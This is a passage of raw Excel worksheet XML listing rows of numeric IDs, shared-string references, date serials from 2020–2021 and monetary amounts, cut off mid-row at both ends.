      <c r="B1919">
        <v>131</v>
      </c>
      <c r="C1919" t="s">
        <v>1427</v>
      </c>
      <c r="D1919" t="s">
        <v>11367</v>
      </c>
      <c r="E1919">
        <v>12</v>
      </c>
      <c r="F1919" t="s">
        <v>11370</v>
      </c>
      <c r="G1919" s="1">
        <v>44147</v>
      </c>
      <c r="H1919">
        <v>200000</v>
      </c>
    </row>
    <row r="1920" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1920">
        <v>21423</v>
      </c>
      <c r="B1920">
        <v>4759</v>
      </c>
      <c r="C1920" t="s">
        <v>7012</v>
      </c>
      <c r="D1920" t="s">
        <v>11305</v>
      </c>
      <c r="E1920">
        <v>16</v>
      </c>
      <c r="F1920" t="s">
        <v>9941</v>
      </c>
      <c r="G1920" s="1">
        <v>44048</v>
      </c>
      <c r="H1920">
        <v>15000</v>
      </c>
      <c r="J1920" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="1921" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1921">
        <v>21425</v>
      </c>
      <c r="B1921">
        <v>1337</v>
      </c>
      <c r="C1921" t="s">
        <v>2768</v>
      </c>
      <c r="D1921" t="s">
        <v>10355</v>
      </c>
      <c r="E1921">
        <v>17</v>
      </c>
      <c r="F1921" t="s">
        <v>9459</v>
      </c>
      <c r="G1921" s="1">
        <v>44020</v>
      </c>
      <c r="H1921">
        <v>0</v>
      </c>
      <c r="I1921" t="s">
        <v>10010</v>
      </c>
      <c r="J1921" t="s">
        <v>11371</v>
      </c>
    </row>
    <row r="1922" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1922">
        <v>21426</v>
      </c>
      <c r="B1922">
        <v>4759</v>
      </c>
      <c r="C1922" t="s">
        <v>7012</v>
      </c>
      <c r="D1922" t="s">
        <v>11305</v>
      </c>
      <c r="E1922">
        <v>16</v>
      </c>
      <c r="F1922" t="s">
        <v>11372</v>
      </c>
      <c r="G1922" s="1">
        <v>44048</v>
      </c>
      <c r="H1922">
        <v>148000</v>
      </c>
      <c r="J1922" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1923" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1923">
        <v>21427</v>
      </c>
      <c r="B1923">
        <v>4759</v>
      </c>
      <c r="C1923" t="s">
        <v>7012</v>
      </c>
      <c r="D1923" t="s">
        <v>11305</v>
      </c>
      <c r="E1923">
        <v>16</v>
      </c>
      <c r="F1923" t="s">
        <v>9925</v>
      </c>
      <c r="G1923" s="1">
        <v>44048</v>
      </c>
      <c r="H1923">
        <v>321000</v>
      </c>
      <c r="J1923" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="1924" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1924">
        <v>21430</v>
      </c>
      <c r="B1924">
        <v>2205</v>
      </c>
      <c r="C1924" t="s">
        <v>5834</v>
      </c>
      <c r="D1924" t="s">
        <v>10691</v>
      </c>
      <c r="E1924">
        <v>14</v>
      </c>
      <c r="F1924" t="s">
        <v>6569</v>
      </c>
      <c r="G1924" s="1">
        <v>44070</v>
      </c>
      <c r="H1924">
        <v>240</v>
      </c>
      <c r="I1924" t="s">
        <v>11373</v>
      </c>
    </row>
    <row r="1925" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1925">
        <v>21431</v>
      </c>
      <c r="B1925">
        <v>2205</v>
      </c>
      <c r="C1925" t="s">
        <v>5834</v>
      </c>
      <c r="D1925" t="s">
        <v>10691</v>
      </c>
      <c r="E1925">
        <v>14</v>
      </c>
      <c r="F1925" t="s">
        <v>11374</v>
      </c>
      <c r="G1925" s="1">
        <v>44070</v>
      </c>
      <c r="H1925">
        <v>120</v>
      </c>
      <c r="I1925" t="s">
        <v>11373</v>
      </c>
    </row>
    <row r="1926" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1926">
        <v>21433</v>
      </c>
      <c r="B1926">
        <v>2856</v>
      </c>
      <c r="C1926" t="s">
        <v>7012</v>
      </c>
      <c r="D1926" t="s">
        <v>11375</v>
      </c>
      <c r="E1926">
        <v>16</v>
      </c>
      <c r="F1926" t="s">
        <v>9441</v>
      </c>
      <c r="G1926" s="1">
        <v>44116</v>
      </c>
      <c r="H1926">
        <v>2493721</v>
      </c>
      <c r="J1926" t="s">
        <v>11376</v>
      </c>
    </row>
    <row r="1927" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1927">
        <v>21434</v>
      </c>
      <c r="B1927">
        <v>2856</v>
      </c>
      <c r="C1927" t="s">
        <v>7012</v>
      </c>
      <c r="D1927" t="s">
        <v>11375</v>
      </c>
      <c r="E1927">
        <v>16</v>
      </c>
      <c r="F1927" t="s">
        <v>673</v>
      </c>
      <c r="G1927" s="1">
        <v>44116</v>
      </c>
      <c r="H1927">
        <v>2737361</v>
      </c>
      <c r="J1927" t="s">
        <v>11376</v>
      </c>
    </row>
    <row r="1928" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1928">
        <v>21435</v>
      </c>
      <c r="B1928">
        <v>2856</v>
      </c>
      <c r="C1928" t="s">
        <v>7012</v>
      </c>
      <c r="D1928" t="s">
        <v>11375</v>
      </c>
      <c r="E1928">
        <v>16</v>
      </c>
      <c r="F1928" t="s">
        <v>10007</v>
      </c>
      <c r="G1928" s="1">
        <v>44116</v>
      </c>
      <c r="H1928">
        <v>3554</v>
      </c>
      <c r="J1928" t="s">
        <v>11376</v>
      </c>
    </row>
    <row r="1929" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1929">
        <v>21436</v>
      </c>
      <c r="B1929">
        <v>2827</v>
      </c>
      <c r="C1929" t="s">
        <v>7193</v>
      </c>
      <c r="D1929" t="s">
        <v>11377</v>
      </c>
      <c r="E1929">
        <v>17</v>
      </c>
      <c r="F1929" t="s">
        <v>5434</v>
      </c>
      <c r="G1929" s="1">
        <v>44022</v>
      </c>
      <c r="H1929">
        <v>100000</v>
      </c>
      <c r="J1929" t="s">
        <v>11378</v>
      </c>
    </row>
    <row r="1930" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1930">
        <v>21437</v>
      </c>
      <c r="B1930">
        <v>2827</v>
      </c>
      <c r="C1930" t="s">
        <v>7193</v>
      </c>
      <c r="D1930" t="s">
        <v>11377</v>
      </c>
      <c r="E1930">
        <v>17</v>
      </c>
      <c r="F1930" t="s">
        <v>9217</v>
      </c>
      <c r="G1930" s="1">
        <v>44022</v>
      </c>
      <c r="H1930">
        <v>60000</v>
      </c>
      <c r="J1930" t="s">
        <v>11379</v>
      </c>
    </row>
    <row r="1931" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1931">
        <v>21438</v>
      </c>
      <c r="B1931">
        <v>2827</v>
      </c>
      <c r="C1931" t="s">
        <v>7193</v>
      </c>
      <c r="D1931" t="s">
        <v>11377</v>
      </c>
      <c r="E1931">
        <v>17</v>
      </c>
      <c r="F1931" t="s">
        <v>9454</v>
      </c>
      <c r="G1931" s="1">
        <v>44022</v>
      </c>
      <c r="H1931">
        <v>30000</v>
      </c>
      <c r="J1931" t="s">
        <v>11380</v>
      </c>
    </row>
    <row r="1932" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1932">
        <v>21439</v>
      </c>
      <c r="B1932">
        <v>2827</v>
      </c>
      <c r="C1932" t="s">
        <v>7193</v>
      </c>
      <c r="D1932" t="s">
        <v>11377</v>
      </c>
      <c r="E1932">
        <v>17</v>
      </c>
      <c r="F1932" t="s">
        <v>4686</v>
      </c>
      <c r="G1932" s="1">
        <v>44022</v>
      </c>
      <c r="H1932">
        <v>30000</v>
      </c>
      <c r="J1932" t="s">
        <v>11380</v>
      </c>
    </row>
    <row r="1933" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1933">
        <v>21440</v>
      </c>
      <c r="B1933">
        <v>2827</v>
      </c>
      <c r="C1933" t="s">
        <v>7193</v>
      </c>
      <c r="D1933" t="s">
        <v>11377</v>
      </c>
      <c r="E1933">
        <v>17</v>
      </c>
      <c r="F1933" t="s">
        <v>11381</v>
      </c>
      <c r="G1933" s="1">
        <v>44022</v>
      </c>
      <c r="H1933">
        <v>20000</v>
      </c>
      <c r="J1933" t="s">
        <v>11382</v>
      </c>
    </row>
    <row r="1934" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1934">
        <v>21441</v>
      </c>
      <c r="B1934">
        <v>2827</v>
      </c>
      <c r="C1934" t="s">
        <v>7193</v>
      </c>
      <c r="D1934" t="s">
        <v>11377</v>
      </c>
      <c r="E1934">
        <v>17</v>
      </c>
      <c r="F1934" t="s">
        <v>11383</v>
      </c>
      <c r="G1934" s="1">
        <v>44022</v>
      </c>
      <c r="H1934">
        <v>20000</v>
      </c>
      <c r="J1934" t="s">
        <v>11382</v>
      </c>
    </row>
    <row r="1935" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1935">
        <v>21442</v>
      </c>
      <c r="B1935">
        <v>2827</v>
      </c>
      <c r="C1935" t="s">
        <v>7193</v>
      </c>
      <c r="D1935" t="s">
        <v>11377</v>
      </c>
      <c r="E1935">
        <v>17</v>
      </c>
      <c r="F1935" t="s">
        <v>512</v>
      </c>
      <c r="G1935" s="1">
        <v>44022</v>
      </c>
      <c r="H1935">
        <v>40000</v>
      </c>
      <c r="J1935" t="s">
        <v>11384</v>
      </c>
    </row>
    <row r="1936" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1936">
        <v>21443</v>
      </c>
      <c r="B1936">
        <v>2827</v>
      </c>
      <c r="C1936" t="s">
        <v>7193</v>
      </c>
      <c r="D1936" t="s">
        <v>11377</v>
      </c>
      <c r="E1936">
        <v>17</v>
      </c>
      <c r="F1936" t="s">
        <v>9466</v>
      </c>
      <c r="G1936" s="1">
        <v>44022</v>
      </c>
      <c r="H1936">
        <v>30000</v>
      </c>
      <c r="J1936" t="s">
        <v>11385</v>
      </c>
    </row>
    <row r="1937" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1937">
        <v>21444</v>
      </c>
      <c r="B1937">
        <v>2827</v>
      </c>
      <c r="C1937" t="s">
        <v>7193</v>
      </c>
      <c r="D1937" t="s">
        <v>11377</v>
      </c>
      <c r="E1937">
        <v>17</v>
      </c>
      <c r="F1937" t="s">
        <v>10387</v>
      </c>
      <c r="G1937" s="1">
        <v>44022</v>
      </c>
      <c r="H1937">
        <v>30000</v>
      </c>
      <c r="J1937" t="s">
        <v>11386</v>
      </c>
    </row>
    <row r="1938" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1938">
        <v>21445</v>
      </c>
      <c r="B1938">
        <v>2693</v>
      </c>
      <c r="C1938" t="s">
        <v>2812</v>
      </c>
      <c r="D1938" t="s">
        <v>11387</v>
      </c>
      <c r="E1938">
        <v>17</v>
      </c>
      <c r="F1938" t="s">
        <v>2236</v>
      </c>
      <c r="G1938" s="1">
        <v>44020</v>
      </c>
      <c r="H1938">
        <v>216000</v>
      </c>
      <c r="J1938" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1939" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1939">
        <v>21446</v>
      </c>
      <c r="B1939">
        <v>2693</v>
      </c>
      <c r="C1939" t="s">
        <v>2812</v>
      </c>
      <c r="D1939" t="s">
        <v>11387</v>
      </c>
      <c r="E1939">
        <v>17</v>
      </c>
      <c r="F1939" t="s">
        <v>9561</v>
      </c>
      <c r="G1939" s="1">
        <v>44020</v>
      </c>
      <c r="H1939">
        <v>300000</v>
      </c>
      <c r="J1939" t="s">
        <v>10034</v>
      </c>
    </row>
    <row r="1940" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1940">
        <v>21447</v>
      </c>
      <c r="B1940">
        <v>4771</v>
      </c>
      <c r="C1940" t="s">
        <v>7139</v>
      </c>
      <c r="D1940" t="s">
        <v>11233</v>
      </c>
      <c r="E1940">
        <v>11</v>
      </c>
      <c r="F1940" t="s">
        <v>11388</v>
      </c>
      <c r="G1940" s="1">
        <v>44102</v>
      </c>
      <c r="H1940">
        <v>50000</v>
      </c>
      <c r="I1940" t="s">
        <v>11389</v>
      </c>
    </row>
    <row r="1941" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1941">
        <v>21451</v>
      </c>
      <c r="B1941">
        <v>1785</v>
      </c>
      <c r="C1941" t="s">
        <v>6147</v>
      </c>
      <c r="D1941" t="s">
        <v>11390</v>
      </c>
      <c r="E1941">
        <v>2</v>
      </c>
      <c r="F1941" t="s">
        <v>11391</v>
      </c>
      <c r="G1941" s="1">
        <v>44081</v>
      </c>
      <c r="H1941">
        <v>2000</v>
      </c>
      <c r="I1941" t="s">
        <v>11392</v>
      </c>
    </row>
    <row r="1942" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1942">
        <v>21452</v>
      </c>
      <c r="B1942">
        <v>848</v>
      </c>
      <c r="C1942" t="s">
        <v>3240</v>
      </c>
      <c r="D1942" t="s">
        <v>11393</v>
      </c>
      <c r="E1942">
        <v>12</v>
      </c>
      <c r="F1942" t="s">
        <v>3242</v>
      </c>
      <c r="G1942" s="1">
        <v>44053</v>
      </c>
      <c r="H1942">
        <v>500</v>
      </c>
      <c r="I1942" t="s">
        <v>11394</v>
      </c>
      <c r="J1942" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1943" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1943">
        <v>21453</v>
      </c>
      <c r="B1943">
        <v>4773</v>
      </c>
      <c r="C1943" t="s">
        <v>7128</v>
      </c>
      <c r="D1943" t="s">
        <v>11206</v>
      </c>
      <c r="E1943">
        <v>13</v>
      </c>
      <c r="F1943" t="s">
        <v>2407</v>
      </c>
      <c r="G1943" s="1">
        <v>44053</v>
      </c>
      <c r="H1943">
        <v>300000</v>
      </c>
      <c r="J1943" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1944" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1944">
        <v>21456</v>
      </c>
      <c r="B1944">
        <v>1678</v>
      </c>
      <c r="C1944" t="s">
        <v>3257</v>
      </c>
      <c r="D1944" t="s">
        <v>11395</v>
      </c>
      <c r="E1944">
        <v>16</v>
      </c>
      <c r="F1944" t="s">
        <v>547</v>
      </c>
      <c r="G1944" s="1">
        <v>44166</v>
      </c>
      <c r="H1944">
        <v>64000</v>
      </c>
      <c r="I1944" t="s">
        <v>9522</v>
      </c>
      <c r="J1944" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1945" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1945">
        <v>21460</v>
      </c>
      <c r="B1945">
        <v>2622</v>
      </c>
      <c r="C1945" t="s">
        <v>6034</v>
      </c>
      <c r="D1945" t="s">
        <v>11396</v>
      </c>
      <c r="E1945">
        <v>13</v>
      </c>
      <c r="F1945" t="s">
        <v>3318</v>
      </c>
      <c r="G1945" s="1">
        <v>44103</v>
      </c>
      <c r="H1945">
        <v>15400</v>
      </c>
      <c r="I1945" t="s">
        <v>11397</v>
      </c>
    </row>
    <row r="1946" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1946">
        <v>21461</v>
      </c>
      <c r="B1946">
        <v>949</v>
      </c>
      <c r="C1946" t="s">
        <v>2621</v>
      </c>
      <c r="D1946" t="s">
        <v>9987</v>
      </c>
      <c r="E1946">
        <v>17</v>
      </c>
      <c r="F1946" t="s">
        <v>9437</v>
      </c>
      <c r="G1946" s="1">
        <v>44022</v>
      </c>
      <c r="H1946">
        <v>3000000</v>
      </c>
      <c r="J1946" t="s">
        <v>11398</v>
      </c>
    </row>
    <row r="1947" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1947">
        <v>21462</v>
      </c>
      <c r="B1947">
        <v>949</v>
      </c>
      <c r="C1947" t="s">
        <v>2621</v>
      </c>
      <c r="D1947" t="s">
        <v>9987</v>
      </c>
      <c r="E1947">
        <v>17</v>
      </c>
      <c r="F1947" t="s">
        <v>11399</v>
      </c>
      <c r="G1947" s="1">
        <v>44022</v>
      </c>
      <c r="H1947">
        <v>3000000</v>
      </c>
      <c r="J1947" t="s">
        <v>11400</v>
      </c>
    </row>
    <row r="1948" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1948">
        <v>21463</v>
      </c>
      <c r="B1948">
        <v>949</v>
      </c>
      <c r="C1948" t="s">
        <v>2621</v>
      </c>
      <c r="D1948" t="s">
        <v>9987</v>
      </c>
      <c r="E1948">
        <v>17</v>
      </c>
      <c r="F1948" t="s">
        <v>2236</v>
      </c>
      <c r="G1948" s="1">
        <v>44022</v>
      </c>
      <c r="H1948">
        <v>6000000</v>
      </c>
      <c r="J1948" t="s">
        <v>11401</v>
      </c>
    </row>
    <row r="1949" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1949">
        <v>21464</v>
      </c>
      <c r="B1949">
        <v>949</v>
      </c>
      <c r="C1949" t="s">
        <v>2621</v>
      </c>
      <c r="D1949" t="s">
        <v>9987</v>
      </c>
      <c r="E1949">
        <v>17</v>
      </c>
      <c r="F1949" t="s">
        <v>4686</v>
      </c>
      <c r="G1949" s="1">
        <v>44022</v>
      </c>
      <c r="H1949">
        <v>2000000</v>
      </c>
      <c r="J1949" t="s">
        <v>11402</v>
      </c>
    </row>
    <row r="1950" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1950">
        <v>21465</v>
      </c>
      <c r="B1950">
        <v>949</v>
      </c>
      <c r="C1950" t="s">
        <v>2621</v>
      </c>
      <c r="D1950" t="s">
        <v>9987</v>
      </c>
      <c r="E1950">
        <v>17</v>
      </c>
      <c r="F1950" t="s">
        <v>11403</v>
      </c>
      <c r="G1950" s="1">
        <v>44022</v>
      </c>
      <c r="H1950">
        <v>2000000</v>
      </c>
      <c r="J1950" t="s">
        <v>11402</v>
      </c>
    </row>
    <row r="1951" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1951">
        <v>21466</v>
      </c>
      <c r="B1951">
        <v>949</v>
      </c>
      <c r="C1951" t="s">
        <v>2621</v>
      </c>
      <c r="D1951" t="s">
        <v>9987</v>
      </c>
      <c r="E1951">
        <v>17</v>
      </c>
      <c r="F1951" t="s">
        <v>10651</v>
      </c>
      <c r="G1951" s="1">
        <v>44022</v>
      </c>
      <c r="H1951">
        <v>3000000</v>
      </c>
      <c r="J1951" t="s">
        <v>10243</v>
      </c>
    </row>
    <row r="1952" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1952">
        <v>21467</v>
      </c>
      <c r="B1952">
        <v>949</v>
      </c>
      <c r="C1952" t="s">
        <v>2621</v>
      </c>
      <c r="D1952" t="s">
        <v>9987</v>
      </c>
      <c r="E1952">
        <v>17</v>
      </c>
      <c r="F1952" t="s">
        <v>11404</v>
      </c>
      <c r="G1952" s="1">
        <v>44022</v>
      </c>
      <c r="H1952">
        <v>2000000</v>
      </c>
      <c r="J1952" t="s">
        <v>11402</v>
      </c>
    </row>
    <row r="1953" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1953">
        <v>21468</v>
      </c>
      <c r="B1953">
        <v>803</v>
      </c>
      <c r="C1953" t="s">
        <v>1359</v>
      </c>
      <c r="D1953" t="s">
        <v>11088</v>
      </c>
      <c r="E1953">
        <v>5</v>
      </c>
      <c r="F1953" t="s">
        <v>9561</v>
      </c>
      <c r="G1953" s="1">
        <v>44089</v>
      </c>
      <c r="H1953">
        <v>40000</v>
      </c>
      <c r="I1953" t="s">
        <v>11405</v>
      </c>
    </row>
    <row r="1954" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1954">
        <v>21469</v>
      </c>
      <c r="B1954">
        <v>953</v>
      </c>
      <c r="C1954" t="s">
        <v>3250</v>
      </c>
      <c r="D1954" t="s">
        <v>11406</v>
      </c>
      <c r="E1954">
        <v>16</v>
      </c>
      <c r="F1954" t="s">
        <v>2105</v>
      </c>
      <c r="G1954" s="1">
        <v>44070</v>
      </c>
      <c r="H1954">
        <v>9500</v>
      </c>
      <c r="I1954" t="s">
        <v>11407</v>
      </c>
    </row>
    <row r="1955" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1955">
        <v>21470</v>
      </c>
      <c r="B1955">
        <v>4803</v>
      </c>
      <c r="C1955" t="s">
        <v>7209</v>
      </c>
      <c r="D1955" t="s">
        <v>11408</v>
      </c>
      <c r="E1955">
        <v>4</v>
      </c>
      <c r="F1955" t="s">
        <v>7211</v>
      </c>
      <c r="G1955" s="1">
        <v>44050</v>
      </c>
      <c r="H1955">
        <v>30000</v>
      </c>
      <c r="J1955" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1956" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1956">
        <v>21471</v>
      </c>
      <c r="B1956">
        <v>2827</v>
      </c>
      <c r="C1956" t="s">
        <v>7193</v>
      </c>
      <c r="D1956" t="s">
        <v>11377</v>
      </c>
      <c r="E1956">
        <v>17</v>
      </c>
      <c r="F1956" t="s">
        <v>9483</v>
      </c>
      <c r="G1956" s="1">
        <v>44022</v>
      </c>
      <c r="H1956">
        <v>10000</v>
      </c>
      <c r="J1956" t="s">
        <v>11385</v>
      </c>
    </row>
    <row r="1957" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1957">
        <v>21472</v>
      </c>
      <c r="B1957">
        <v>1574</v>
      </c>
      <c r="C1957" t="s">
        <v>11409</v>
      </c>
      <c r="D1957" t="s">
        <v>11410</v>
      </c>
      <c r="E1957">
        <v>18</v>
      </c>
      <c r="F1957" t="s">
        <v>11411</v>
      </c>
      <c r="G1957" s="1">
        <v>44214</v>
      </c>
      <c r="H1957">
        <v>250</v>
      </c>
      <c r="I1957" t="s">
        <v>11412</v>
      </c>
    </row>
    <row r="1958" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1958">
        <v>21473</v>
      </c>
      <c r="B1958">
        <v>993</v>
      </c>
      <c r="C1958" t="s">
        <v>3233</v>
      </c>
      <c r="D1958" t="s">
        <v>11413</v>
      </c>
      <c r="E1958">
        <v>26</v>
      </c>
      <c r="F1958" t="s">
        <v>2236</v>
      </c>
      <c r="G1958" s="1">
        <v>44235</v>
      </c>
      <c r="H1958">
        <v>250000</v>
      </c>
      <c r="J1958" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="1959" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1959">
        <v>21474</v>
      </c>
      <c r="B1959">
        <v>993</v>
      </c>
      <c r="C1959" t="s">
        <v>3233</v>
      </c>
      <c r="D1959" t="s">
        <v>11413</v>
      </c>
      <c r="E1959">
        <v>26</v>
      </c>
      <c r="F1959" t="s">
        <v>11414</v>
      </c>
      <c r="G1959" s="1">
        <v>44235</v>
      </c>
      <c r="H1959">
        <v>1000</v>
      </c>
      <c r="J1959" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="1960" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1960">
        <v>21475</v>
      </c>
      <c r="B1960">
        <v>993</v>
      </c>
      <c r="C1960" t="s">
        <v>3233</v>
      </c>
      <c r="D1960" t="s">
        <v>11413</v>
      </c>
      <c r="E1960">
        <v>26</v>
      </c>
      <c r="F1960" t="s">
        <v>11415</v>
      </c>
      <c r="G1960" s="1">
        <v>44235</v>
      </c>
      <c r="H1960">
        <v>1000</v>
      </c>
      <c r="J1960" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1961" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1961">
        <v>21476</v>
      </c>
      <c r="B1961">
        <v>993</v>
      </c>
      <c r="C1961" t="s">
        <v>3233</v>
      </c>
      <c r="D1961" t="s">
        <v>11413</v>
      </c>
      <c r="E1961">
        <v>26</v>
      </c>
      <c r="F1961" t="s">
        <v>11416</v>
      </c>
      <c r="G1961" s="1">
        <v>44235</v>
      </c>
      <c r="H1961">
        <v>1000</v>
      </c>
      <c r="J1961" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="1962" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1962">
        <v>21477</v>
      </c>
      <c r="B1962">
        <v>993</v>
      </c>
      <c r="C1962" t="s">
        <v>3233</v>
      </c>
      <c r="D1962" t="s">
        <v>11413</v>
      </c>
      <c r="E1962">
        <v>26</v>
      </c>
      <c r="F1962" t="s">
        <v>11417</v>
      </c>
      <c r="G1962" s="1">
        <v>44235</v>
      </c>
      <c r="H1962">
        <v>1000</v>
      </c>
      <c r="J1962" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1963" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1963">
        <v>21478</v>
      </c>
      <c r="B1963">
        <v>993</v>
      </c>
      <c r="C1963" t="s">
        <v>3233</v>
      </c>
      <c r="D1963" t="s">
        <v>11413</v>
      </c>
      <c r="E1963">
        <v>26</v>
      </c>
      <c r="F1963" t="s">
        <v>4686</v>
      </c>
      <c r="G1963" s="1">
        <v>44235</v>
      </c>
      <c r="H1963">
        <v>1000</v>
      </c>
      <c r="J1963" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="1964" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1964">
        <v>21479</v>
      </c>
      <c r="B1964">
        <v>993</v>
      </c>
      <c r="C1964" t="s">
        <v>3233</v>
      </c>
      <c r="D1964" t="s">
        <v>11413</v>
      </c>
      <c r="E1964">
        <v>26</v>
      </c>
      <c r="F1964" t="s">
        <v>9437</v>
      </c>
      <c r="G1964" s="1">
        <v>44235</v>
      </c>
      <c r="H1964">
        <v>1000</v>
      </c>
      <c r="J1964" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1965" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1965">
        <v>21480</v>
      </c>
      <c r="B1965">
        <v>993</v>
      </c>
      <c r="C1965" t="s">
        <v>3233</v>
      </c>
      <c r="D1965" t="s">
        <v>11413</v>
      </c>
      <c r="E1965">
        <v>26</v>
      </c>
      <c r="F1965" t="s">
        <v>9527</v>
      </c>
      <c r="G1965" s="1">
        <v>44235</v>
      </c>
      <c r="H1965">
        <v>1000</v>
      </c>
      <c r="J1965" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1966" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1966">
        <v>21481</v>
      </c>
      <c r="B1966">
        <v>1647</v>
      </c>
      <c r="C1966" t="s">
        <v>3103</v>
      </c>
      <c r="D1966" t="s">
        <v>11418</v>
      </c>
      <c r="E1966">
        <v>17</v>
      </c>
      <c r="F1966" t="s">
        <v>11419</v>
      </c>
      <c r="G1966" s="1">
        <v>44050</v>
      </c>
      <c r="H1966">
        <v>250000</v>
      </c>
      <c r="I1966" t="s">
        <v>9698</v>
      </c>
      <c r="J1966" t="s">
        <v>11420</v>
      </c>
    </row>
    <row r="1967" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1967">
        <v>21482</v>
      </c>
      <c r="B1967">
        <v>1647</v>
      </c>
      <c r="C1967" t="s">
        <v>3103</v>
      </c>
      <c r="D1967" t="s">
        <v>11418</v>
      </c>
      <c r="E1967">
        <v>17</v>
      </c>
      <c r="F1967" t="s">
        <v>9459</v>
      </c>
      <c r="G1967" s="1">
        <v>44050</v>
      </c>
      <c r="H1967">
        <v>800000</v>
      </c>
      <c r="I1967" t="s">
        <v>9698</v>
      </c>
      <c r="J1967" t="s">
        <v>11421</v>
      </c>
    </row>
    <row r="1968" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1968">
        <v>21483</v>
      </c>
      <c r="B1968">
        <v>2577</v>
      </c>
      <c r="C1968" t="s">
        <v>5230</v>
      </c>
      <c r="D1968" t="s">
        <v>10169</v>
      </c>
      <c r="E1968">
        <v>12</v>
      </c>
      <c r="F1968" t="s">
        <v>2236</v>
      </c>
      <c r="G1968" s="1">
        <v>44099</v>
      </c>
      <c r="H1968">
        <v>50000</v>
      </c>
      <c r="J1968" t="s">
        <v>11422</v>
      </c>
    </row>
    <row r="1969" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1969">
        <v>21484</v>
      </c>
      <c r="B1969">
        <v>2577</v>
      </c>
      <c r="C1969" t="s">
        <v>5230</v>
      </c>
      <c r="D1969" t="s">
        <v>10169</v>
      </c>
      <c r="E1969">
        <v>12</v>
      </c>
      <c r="F1969" t="s">
        <v>9459</v>
      </c>
      <c r="G1969" s="1">
        <v>44099</v>
      </c>
      <c r="H1969">
        <v>75000</v>
      </c>
      <c r="J1969" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="1970" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1970">
        <v>21485</v>
      </c>
      <c r="B1970">
        <v>2577</v>
      </c>
      <c r="C1970" t="s">
        <v>5230</v>
      </c>
      <c r="D1970" t="s">
        <v>10169</v>
      </c>
      <c r="E1970">
        <v>12</v>
      </c>
      <c r="F1970" t="s">
        <v>9435</v>
      </c>
      <c r="G1970" s="1">
        <v>44099</v>
      </c>
      <c r="H1970">
        <v>150000</v>
      </c>
      <c r="J1970" t="s">
        <v>11423</v>
      </c>
    </row>
    <row r="1971" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1971">
        <v>21486</v>
      </c>
      <c r="B1971">
        <v>2577</v>
      </c>
      <c r="C1971" t="s">
        <v>5230</v>
      </c>
      <c r="D1971" t="s">
        <v>10169</v>
      </c>
      <c r="E1971">
        <v>12</v>
      </c>
      <c r="F1971" t="s">
        <v>9437</v>
      </c>
      <c r="G1971" s="1">
        <v>44099</v>
      </c>
      <c r="H1971">
        <v>75000</v>
      </c>
      <c r="I1971" t="s">
        <v>11424</v>
      </c>
      <c r="J1971" t="s">
        <v>11425</v>
      </c>
    </row>
    <row r="1972" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1972">
        <v>21487</v>
      </c>
      <c r="B1972">
        <v>2577</v>
      </c>
